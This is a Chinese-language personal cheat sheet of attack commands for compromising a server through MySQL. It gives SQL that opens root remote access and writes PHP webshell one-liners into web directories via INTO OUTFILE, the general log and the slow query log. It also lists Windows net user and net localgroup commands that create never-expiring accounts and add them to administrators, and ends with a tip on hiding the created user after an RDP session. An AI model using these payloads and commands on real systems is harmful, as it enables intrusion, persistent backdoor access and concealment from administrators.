MYSQL写入webshell、CMD提权命令

 

#自己记录整理
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION; #开启mysql远程访问
GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root"; #开启mysql远程访问

#利用安全日志
show variables like '%secure%'; #查看安全设置
#查看是否支持secure_file_priv
select '<?php ($_=@$_GET[2]).@$_($_POST[1])?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\xx.php';  # 如果支持就可以 写入webshell

#利用普通日志
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址
select '<?php eval($_GET[g]);?>' #写入shell
set global general_log=off; #关闭general log模式

#利用慢查询日志 slow_query_log

show variables like "%log%"; # 查看日志
show variables like "%long%"; #查看超过多少时间的为慢查询，则被日志记录；
set global slow_query_log="on"; #开启慢查询日志
set global slow_query_log_flie="D:/phpStudy/PHPTutorial/WWW/xx.php"; #日志记录地址
select "<php eval($_POST['p'])>" from user where sleep(11); #超过10s被日志记录 user表必须存在

添加一个指定用户名和密码的用户，/expires:never 表示帐户永不过期；
net user 用户名 密码 /add  /expires:never

删除用户。
net user 用户名 /delete

将用户加入到指定的组中。
net localgroup 组 用户名 /add #加入组中
net localgroup 组 用户 /delete #从组中删除

将域用户添加到管理员组/从管理员组删除

net localgroup administrators 域\用户 /add
net localgroup administrators 域\用户 /delete

net user myuser /active:no 禁用 myuser 用户
net user myuser /active:yes 激活 myuser 用户
net user myuser /passwordchg:yes 用户 myuser 可以改变密码
net user myuser /passwordreq:yes 用户 myuser 必须拥有密码
net user myuser /expires:never 用户 myuser 永不过期

3389连接后 注销登录退出  不然任务管理器里面可以看到你创建的用户